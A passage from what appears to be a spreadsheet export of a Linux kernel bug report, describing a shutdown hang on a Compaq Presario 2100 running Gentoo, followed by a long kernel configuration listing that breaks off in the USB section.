  </si>
  <si>
    <t>2003-09-11 16:37 UTC</t>
  </si>
  <si>
    <t>2004-03-04 11:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Compaq Presario 2100 Laptop AthlonXP 2200 and 512MB RAM Software Environment: (See large output of current versions of everything installed at end) Problem Description: Linux hangs at the end of the shutdown procedure just after 'Remounting all filesystems read-only'. This problem is new for test5. It worked fine in test1 thru test4. Steps to reproduce: Simply shutdown the system. It happens everytime on mine. --------------------------------------------- Kernel .config file: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y CONFIG_BROKEN_ON_SMP=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y # CONFIG_SMP is not set CONFIG_PREEMPT=y # CONFIG_X86_UP_APIC is not set CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set CONFIG_EDD=y CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI_HT=y CONFIG_ACPI=y CONFIG_ACPI_BOOT=y # CONFIG_ACPI_SLEEP is not set CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # # APM (Advanced Power Management) BIOS Support # # CONFIG_APM is not set # # CPU Frequency scaling # CONFIG_CPU_FREQ=y # CONFIG_CPU_FREQ_PROC_INTF is not set CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE=y # CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE is not set CONFIG_CPU_FREQ_GOV_PERFORMANCE=y CONFIG_CPU_FREQ_GOV_POWERSAVE=y CONFIG_CPU_FREQ_GOV_USERSPACE=y # CONFIG_CPU_FREQ_24_API is not set CONFIG_CPU_FREQ_TABLE=y # # CPUFreq processor drivers # # CONFIG_X86_ACPI_CPUFREQ is not set # CONFIG_X86_POWERNOW_K6 is not set CONFIG_X86_POWERNOW_K7=y # CONFIG_X86_GX_SUSPMOD is not set # CONFIG_X86_SPEEDSTEP_ICH is not set # CONFIG_X86_SPEEDSTEP_CENTRINO is not set # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # CONFIG_PCMCIA=y CONFIG_YENTA=y CONFIG_CARDBUS=y # CONFIG_I82092 is not set # CONFIG_TCIC is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_CML1=y # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_ISAPNP is not set CONFIG_PNPBIOS=y # # Block devices # # CONFIG_BLK_DEV_FD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_LOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_BLK_DEV_INITRD is not set CONFIG_LBD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set # CONFIG_BLK_DEV_IDECS is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set CONFIG_BLK_DEV_IDESCSI=y # CONFIG_IDE_TASK_IOCTL is not set # CONFIG_IDE_TASKFILE_IO is not set # # IDE chipset support/bugfixes # CONFIG_BLK_DEV_CMD640=y # CONFIG_BLK_DEV_CMD640_ENHANCED is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set CONFIG_BLK_DEV_ALI15X3=y # CONFIG_WDC_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_DMA_NONPCI is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=y CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set CONFIG_SCSI_AIC7XXX=y CONFIG_AIC7XXX_CMDS_PER_DEVICE=64 CONFIG_AIC7XXX_RESET_DELAY_MS=2000 # CONFIG_AIC7XXX_PROBE_EISA_VL is not set # CONFIG_AIC7XXX_BUILD_FIRMWARE is not set # CONFIG_AIC7XXX_DEBUG_ENABLE is not set CONFIG_AIC7XXX_DEBUG_MASK=0 CONFIG_AIC7XXX_REG_PRETTY_PRINT=y # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set CONFIG_SCSI_QLOGIC_1280=y # CONFIG_SCSI_QLOGIC_1280_PIO is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # PCMCIA SCSI adapter support # # CONFIG_PCMCIA_AHA152X is not set # CONFIG_PCMCIA_FDOMAIN is not set # CONFIG_PCMCIA_NINJA_SCSI is not set # CONFIG_PCMCIA_QLOGIC is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set # CONFIG_DECNET is not set CONFIG_BRIDGE=y CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_BRIDGE_NETFILTER=y # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y CONFIG_IP_NF_FTP=y CONFIG_IP_NF_IRC=y # CONFIG_IP_NF_TFTP is not set # CONFIG_IP_NF_AMANDA is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=y CONFIG_IP_NF_MATCH_IPRANGE=y CONFIG_IP_NF_MATCH_MAC=y CONFIG_IP_NF_MATCH_PKTTYPE=y CONFIG_IP_NF_MATCH_MARK=y CONFIG_IP_NF_MATCH_MULTIPORT=y CONFIG_IP_NF_MATCH_TOS=y CONFIG_IP_NF_MATCH_RECENT=y CONFIG_IP_NF_MATCH_ECN=y CONFIG_IP_NF_MATCH_DSCP=y CONFIG_IP_NF_MATCH_AH_ESP=y CONFIG_IP_NF_MATCH_LENGTH=y CONFIG_IP_NF_MATCH_TTL=y CONFIG_IP_NF_MATCH_TCPMSS=y CONFIG_IP_NF_MATCH_HELPER=y CONFIG_IP_NF_MATCH_STATE=y CONFIG_IP_NF_MATCH_CONNTRACK=y CONFIG_IP_NF_MATCH_OWNER=y CONFIG_IP_NF_MATCH_PHYSDEV=y CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y # CONFIG_IP_NF_TARGET_REDIRECT is not set CONFIG_IP_NF_TARGET_NETMAP=y CONFIG_IP_NF_TARGET_SAME=y # CONFIG_IP_NF_NAT_LOCAL is not set # CONFIG_IP_NF_NAT_SNMP_BASIC is not set CONFIG_IP_NF_NAT_IRC=y CONFIG_IP_NF_NAT_FTP=y CONFIG_IP_NF_MANGLE=y CONFIG_IP_NF_TARGET_TOS=y CONFIG_IP_NF_TARGET_ECN=y CONFIG_IP_NF_TARGET_DSCP=y CONFIG_IP_NF_TARGET_MARK=y CONFIG_IP_NF_TARGET_CLASSIFY=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y # CONFIG_IP_NF_TARGET_TCPMSS is not set CONFIG_IP_NF_ARPTABLES=y CONFIG_IP_NF_ARPFILTER=y CONFIG_IP_NF_ARP_MANGLE=y # # Bridge: Netfilter Configuration # # CONFIG_BRIDGE_NF_EBTABLES is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set CONFIG_NATSEMI=y # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_PPP_MULTILINK is not set CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=y CONFIG_PPP_SYNC_TTY=y CONFIG_PPP_DEFLATE=y CONFIG_PPP_BSDCOMP=y CONFIG_PPPOE=y # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # PCMCIA network device support # # CONFIG_NET_PCMCIA is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_INPUT_JOYDEV=y # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set CONFIG_SERIO_PCIPS2=y # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_MOUSE_SERIAL=y CONFIG_INPUT_JOYSTICK=y # CONFIG_JOYSTICK_IFORCE is not set CONFIG_JOYSTICK_WARRIOR=y # CONFIG_JOYSTICK_MAGELLAN is not set # CONFIG_JOYSTICK_SPACEORB is not set # CONFIG_JOYSTICK_SPACEBALL is not set # CONFIG_JOYSTICK_STINGER is not set # CONFIG_JOYSTICK_TWIDDLER is not set # CONFIG_JOYSTICK_DB9 is not set # CONFIG_JOYSTICK_GAMECON is not set # CONFIG_JOYSTICK_TURBOGRAFX is not set # CONFIG_INPUT_JOYDUMP is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set # CONFIG_SERIAL_8250_CS is not set CONFIG_SERIAL_8250_ACPI=y # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # # CONFIG_I2C is not set # # I2C Hardware Sensors Mainboard support # # # I2C Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # # Mice # CONFIG_BUSMOUSE=y # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y CONFIG_AGP_ALI=y CONFIG_AGP_ATI=y CONFIG_AGP_AMD=y # CONFIG_AGP_AMD64 is not set CONFIG_AGP_INTEL=y # CONFIG_AGP_NVIDIA is not set CONFIG_AGP_SIS=y CONFIG_AGP_SWORKS=y CONFIG_AGP_VIA=y CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set # CONFIG_DRM_R128 is not set CONFIG_DRM_RADEON=y # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_MGA is not set # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y # CONFIG_EXT2_FS_POSIX_ACL is not set # CONFIG_EXT2_FS_SECURITY is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y CONFIG_NTFS_FS=y # CONFIG_NTFS_DEBUG is not set # CONFIG_NTFS_RW is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_DEVFS_FS=y CONFIG_DEVFS_MOUNT=y # CONFIG_DEVFS_DEBUG is not set CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=y CONFIG_NFS_V3=y CONFIG_NFS_V4=y CONFIG_NFSD=y CONFIG_NFSD_V3=y CONFIG_NFSD_V4=y CONFIG_NFSD_TCP=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y CONFIG_SUNRPC=y CONFIG_SUNRPC_GSS=y CONFIG_RPCSEC_GSS_KRB5=y CONFIG_SMB_FS=y # CONFIG_SMB_NLS_DEFAULT is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_SMB_NLS=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # CONFIG_SND_ALI5451=y # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set CONFIG_SND_INTEL8X0=y # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # PCMCIA devices # # CONFIG_SND_VXPOCKET is not set # CONFIG_SND_VXP440 is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y CONFIG_USB_OHCI_HCD=y # CONFIG_USB_UHCI_HCD is not set # # USB Device Class drivers # # CONFIG_USB_AUDIO is 